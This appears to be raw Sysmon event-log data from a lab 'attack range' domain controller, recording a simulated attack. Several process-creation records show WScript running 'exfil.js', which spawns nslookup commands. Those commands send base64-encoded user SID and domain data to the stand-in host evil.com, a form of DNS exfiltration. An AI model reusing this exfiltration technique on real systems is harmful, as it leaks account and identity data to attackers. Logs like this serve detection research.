14:16:15.788{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-B93E-000000005F02}5912C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.788{2E1864BB-17AF-629A-B73E-000000005F02}73085948C:\Windows\system32\cmd.exe{2E1864BB-17AF-629A-B93E-000000005F02}5912C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.796{2E1864BB-17AF-629A-B93E-000000005F02}5912C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AF-629A-B73E-000000005F02}7308C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlguqmpu.tmp 2>&1 10341000x8000000000000000196403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.772{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-B83E-000000005F02}4860C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.772{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-B83E-000000005F02}4860C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.772{2E1864BB-17AF-629A-B83E-000000005F02}48605200C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-B73E-000000005F02}7308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.756{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-B83E-000000005F02}4860C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.741{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.741{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.741{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.741{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.741{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-B73E-000000005F02}7308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.741{2E1864BB-17A1-629A-783D-000000005F02}55525044C:\Windows\System32\WScript.exe{2E1864BB-17AF-629A-B73E-000000005F02}7308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.753{2E1864BB-17AF-629A-B73E-000000005F02}7308C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlguqmpu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.741{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nleuq.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.722{2E1864BB-17AF-629A-B53E-000000005F02}3885620C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-B63E-000000005F02}7948C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.721{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.721{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.720{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.720{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.720{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-B63E-000000005F02}7948C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196385Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.720{2E1864BB-17AF-629A-B43E-000000005F02}67163656C:\Windows\system32\cmd.exe{2E1864BB-17AF-629A-B63E-000000005F02}7948C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196384Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.720{2E1864BB-17AF-629A-B63E-000000005F02}7948C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AF-629A-B43E-000000005F02}6716C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleuq.tmp 2>&1 10341000x8000000000000000196383Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.688{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-B53E-000000005F02}388C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196382Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.688{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-B53E-000000005F02}388C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196381Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.688{2E1864BB-17AF-629A-B53E-000000005F02}3885620C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-B43E-000000005F02}6716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196380Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.688{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-B53E-000000005F02}388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196379Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.672{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-B43E-000000005F02}6716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.672{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.672{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.672{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196375Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.672{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196374Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 